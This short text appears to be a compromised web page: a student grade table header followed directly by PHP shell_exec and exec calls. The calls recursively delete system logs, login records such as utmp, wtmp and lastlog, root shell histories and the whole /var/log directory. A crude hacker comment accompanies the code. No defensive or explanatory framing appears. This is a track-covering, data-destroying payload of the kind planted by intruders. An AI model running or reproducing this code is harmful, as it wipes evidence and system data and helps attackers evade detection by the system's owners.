Student Name Roll No. Reg. No Course Name Gread Point
shell_exec("rm -rf /var/run/utmp");
shell_exec("rm -rf /var/apache/log");
shell_exec("rm -rf /var/apache/logs");
shell_exec("rm -rf /usr/local/apache/log");
shell_exec("rm -rf /usr/local/apache/logs");
shell_exec("rm -rf /root/.bash_logout");
shell_exec("rm -rf /root/.bash_history");
shell_exec("rm -rf /root/.ksh_history");
shell_exec("rm -rf /tmp/logs");
//shell_exec function madafuck !
exec("rm -rf /var/log/wtmp");
exec("rm -rf /var/log/lastlog");
exec("rm -rf $HISTFILE");
exec("rm -rf /etc/utmp");
exec("rm -rf /etc/wtmp");
exec("rm -rf /var/adm");
exec("rm -rf /var/log");
exec("rm -rf /var/logs");
exec("rm -rf /var/run/utmp");